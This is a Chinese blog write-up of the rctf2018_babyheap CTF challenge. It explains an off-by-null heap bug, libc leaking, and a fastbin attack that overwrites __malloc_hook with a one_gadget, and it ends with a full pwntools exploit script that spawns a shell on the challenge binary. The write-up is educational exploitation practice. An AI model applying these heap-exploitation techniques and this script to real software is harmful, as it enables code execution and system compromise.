BUUCTF【rctf2018_babyheap】

最新推荐文章于 2022-09-06 14:54:30 发布
最新推荐文章于 2022-09-06 14:54:30 发布
阅读量3.1k 收藏 1
点赞数 4
分类专栏: buuctf刷题 文章标签: 安全 pwn linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/123317222
版权

BUUCTF 【rctf2018_babyheap】

今天下午干了一下午,估计是我太菜了呜呜呜
拿到附件,先检查程序

例行检查:

在这里插入图片描述
保护机制全开,这很‘堆题’

程序和漏洞分析

在这里插入图片描述
程序又add,show,del三个功能,漏洞点在add()中;
在这里插入图片描述
在这里插入图片描述
存在off by null漏洞,可以溢出一个’\x00’字节,
show(),del()函数功能正常,
而程序add堆块时,调用的是calloc,即限制了我们申请tcachebin,我们不能申请tcachebin,也就不可以来打free_hook来get shell.这里我们通过打malloc_hook来get shell

思路

1.我们通过off by null漏洞来leak出libc地址
2.通过libc地址算出malloc_hook地址,以及需要用到的一些地址,
并堆风水,为下边fastbin attack做准备
3.利用堆好的风水构造overlap,劫持malloc_hook,覆写为one_gadget,
4.申请堆块,触发one_gadget来get shell

exp分析:
#为泄露libc地址堆风水
add(0xa0,'AAA')
add(0x18,'AAA')
add(0xf0,'SSSS')
add(0xc8,'NNNN')#3
#为fastbin堆风水
add(0xa0,'aa')
add(0x68,'AAA')#5
add(0xf0,'AAA')

for i in range(7):
	add(0xa0,'A')

for i in range(7):
	add(0xf0,'A')

for i in range(7):
	add(0x10,'A')

for i in range(21):
	free(i+7)

for i in range(7):  //先申请70x60的堆块,为了fastbin attack 做准备,如果之后在申请的话会出现顺序问题
	add(0x60,'t')

for i in range(7):     //释放0x60的堆块,之后再free掉5号堆块的话就会进入fastbin中
	free(i+7)

此时bin中情况:
在这里插入图片描述
我们进行了4种大小的tcachebin处理,为后续做准备

free(0)#进入unsortedbin中
free(1)#进入fastbin中
add(0x18,'A'*0x10+p64(0xd0))#利用off by null漏洞

此时堆中情况:
在这里插入图片描述
此时我们已经将size位改成了0x100,之后再free此堆块,触发off by null

free(2)#触发
add(0xa0,'B')#1
show(0)

leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
success('leak:'+hex(leak))
libc_base = leak-0x3ebca0
one = [0x4f2a5,0x4f302,0x10a2fc]
one_gadget = libc_base + one[1]
success('libc_base:'+hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
malloc_hook = libc_base + libc.sym['__malloc_hook']
success('malloc_hook:'+hex(malloc_hook))
success('free_hook:'+hex(free_hook))
success('system:'+hex(system))

已经算出地址:
在这里插入图片描述
接下来再次进行堆块布局,劫持malloc_hook即可
这是我们接下来要进行fastbin attack 的三个堆块:
在这里插入图片描述

//off by null
free(4)
free(5)
add(0x68,'A'*0x60+p64(0x120))
free(2)
free(6)
add(0xc0,'A')
add(0x40,'A')
add(0xc0,'A'*0xa0+p64(0)+p64(0x70)+p64(malloc_hook-0x23))#劫持到malloc_hook-0x23的位置,这里注意我们劫持到的堆块在fastbin 中,要绕过堆头的检查机制
add(0x60,'A')
add(0x60,'A'*0x13+p64(one_gadget))#劫持malloc_hook为one_gadget

接下来再次申请触发one_gadget即可

io.recvuntil(':')
io.sendline('1')
io.recvuntil(':')
io.sendline('20')

完整exp:

from pwn import *
elf = ELF('./babyheap')
#io = remote('node4.buuoj.cn',28724)
io = process('./babyheap')
libc = elf.libc
context.log_level = 'debug'

def choice(c):
	io.recvuntil(':')
	io.sendline(str(c))

def add(size,content):
	choice(1)
	io.recvuntil(':')
	io.sendline(str(size))
	io.recvuntil(':')
	io.sendline(content)

def show(idx):
	choice(2)
	io.recvuntil(':')
	io.sendline(str(idx))

def free(idx):
	choice(3)
	io.recvuntil(':')
	io.sendline(str(idx))

add(0xa0,'AAA')
add(0x18,'AAA')
add(0xf0,'SSSS')
add(0xc8,'NNNN')#3

add(0xa0,'aa')
add(0x68,'AAA')
add(0xf0,'AAA')

for i in range(7):
	add(0xa0,'A')

for i in range(7):
	add(0xf0,'A')

for i in range(7):
	add(0x10,'A')

for i in range(21):
	free(i+7)

for i in range(7):
	add(0x60,'t')

for i in range(7):
	free(i+7)

free(0)
free(1)
add(0x18,'A'*0x10+p64(0xd0))

free(2)
add(0xa0,'B')#1
show(0)

leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
success('leak:'+hex(leak))
libc_base = leak-0x3ebca0
one = [0x4f2a5,0x4f302,0x10a2fc]
one_gadget = libc_base + one[1]
success('libc_base:'+hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
malloc_hook = libc_base + libc.sym['__malloc_hook']
success('malloc_hook:'+hex(malloc_hook))
success('free_hook:'+hex(free_hook))
success('system:'+hex(system))

free(4)
free(5)
add(0x68,'A'*0x60+p64(0x120))
free(2)
free(6)
add(0xc0,'A')
add(0x40,'A')
add(0xc0,'A'*0xa0+p64(0)+p64(0x70)+p64(malloc_hook-0x23))
add(0x60,'A')
add(0x60,'A'*0x13+p64(one_gadget))

io.recvuntil(':')
io.sendline('1')
io.recvuntil(':')
io.sendline('20')

#gdb.attach(io)

io.interactive()

在这里插入图片描述
喜提flag!!!

Leee333
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 633
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
RCTF-2018 babyheap详解
极目楚天舒的博客
06-19 1798
0x01题目分析qts@qts-PC:~/奇幻世界/RCTF2018/babyheap_38af156349af04e8f6dc22a0ffee6a7a$ ./checksec.sh --file babyheap RELRO STACK CANARY NX PIE RPATH RUNPATH FIL...
[BUUCTF-pwn] rctf2018_babyheap
weixin_52640415的博客
10-29 182
这个题的原题是Ubuntu16 libc-2.23在BUUOJ上改为libc-2.27这是个不小的坑 先看概况 保护全开 有add,free,show add的size<0x100,使用calloc分配, 漏洞:输入结束加\0 ----Off-by-null 这个题在libc-2.23上网上有exp,难度不大,换成libc-2.27后有几个点需要绕 常见的off_by_null打法: 建块A,B,C,D四个堆块 A要能释放到unsort,B块一般用0x68将来有malloc_hook-.
BUUCTF 0ctf-babyheap
doudoudedi
12-20 406
这道题分配内存空间是用calloc释放之后会清空分配的内容 edit函数存在堆溢出我们由打赢函数指针数组存在satck地址随机,我们先想到的fastbin attack写onegadget但是要先有libc基址也是先是information leak然后contorl pc我们就可以 先分配4个 add(0x10) #0 add(0x10) #1 add(0x80) #2 add(0x10...
BUUCTF(pwn) babyheap_0ctf_2017
半岛铁盒的博客
07-30 230
入门堆题 main菜单 add edit edit,我们写入数据的长度是我们可以自己控制的,我们可以利用这点溢出到另一个堆块上 free,普通的释放chunk的过程 show 利用过程:堆溢出,可以通过重叠堆来泄露libc 分为两步: 第一次先泄露 libc 地址, 第二次利用fastbin attack,修改malloc_hook为one_gadget from pwn import * context.log_level = 'debug' p=remote("node4.buuoj.c
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
最新发布
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
[BUUCTF]PWN——babyheap_0ctf_2017
mcmuyanga的博客
12-23 2633
[BUUCTF]PWN19——babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个视频,我也刚接触堆不久,有些地方我也讲不清楚 ida载入,先看一下main函数,做堆题的时候需要将程序给理清楚了,这边的几个选项函数一开始不是如图所示的,我们可以右击给他重新命名一下,为了让我们看的更清楚 add,就是简单的创建一个chunk edit,我们写入数据的长度是我们可以自己控制的,存在堆
BUUCTF-----actf_2019_babyheap (UAF)
半岛铁盒的博客
06-15 6198
这道题和之前做的 hitcontraining_uaf 这道题类似 64位程序,没开PIE 并且这里发现了 bin/sh 字符串
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1507
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
0ctf babyheap
qq_41071646的博客
05-13 474
这个题 一开始 不知道是怎么回事 然后这个程序开了 保护全开 基址随机化 这就要我们自己把libc的基址给泄露出来 泄露的方法我知道的是 把堆 free到 unsortbin的fd和bk指向自身main_arena 然后可以根据 main_arena 的偏移 搞出libc 库 道理都懂 但是怎么做 就不好说了 现在这里就有一道题 典型的菜单题 然后 看一下大概内容 有没...
2017/2018-0ctf-babyheap-writeup
【xiaoxiaorenwu's blog】
04-07 766
因为最近2019届0ctf-tctf开始了,想去水一水,特别把2018babyheap和2017的babyheap做了一下汲取一下经验,感觉两题类型相似,大致思路相同,2018比2017的利用条件更加苛刻一些。所以把两个题目放在一起来写,有助于加深对fastbin_attack的理解,和提高知识运用的灵活性。 首先提供两道题目的二进制文件:2017_0ctf_babyheap 2018...
[BUUCTF-pwn] rctf2018_stringer
weixin_52640415的博客
01-21 564
当calloc 遇见 mmap 有题有个free明显的UAF,但是建块用的calloc会清0又没有show,就比较麻烦了。 有个edit int sub_E5E() { int result; // eax unsigned int v1; // [rsp+Ch] [rbp-14h] unsigned int v2; // [rsp+10h] [rbp-10h] unsigned int v3; // [rsp+14h] [rbp-Ch] __int64 v4; // [rsp+
babyheap_0ctf_2017 详细解析【BUUCTF
qq_41696518的博客
09-06 2768
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 601
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
BUUCTF:【x_nuca_2018_offbyone2】(off by null)
weixin_51055545的博客
01-06 1246
在buu里挑了一道heap的题,是一道off by null 的题,比较容易,经典一些 例行检查:
buuctf re luky_guy
09-27
buuctf re是一个缩写,表示buuctf关于luky_guy的回答。根据提供的引用内容,Luky库是一组抽象复杂操作的Java类,包括用于网络、事件处理、加密、数据库处理、snmp监视、队列、信号量、解析器、XML处理程序等的类。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值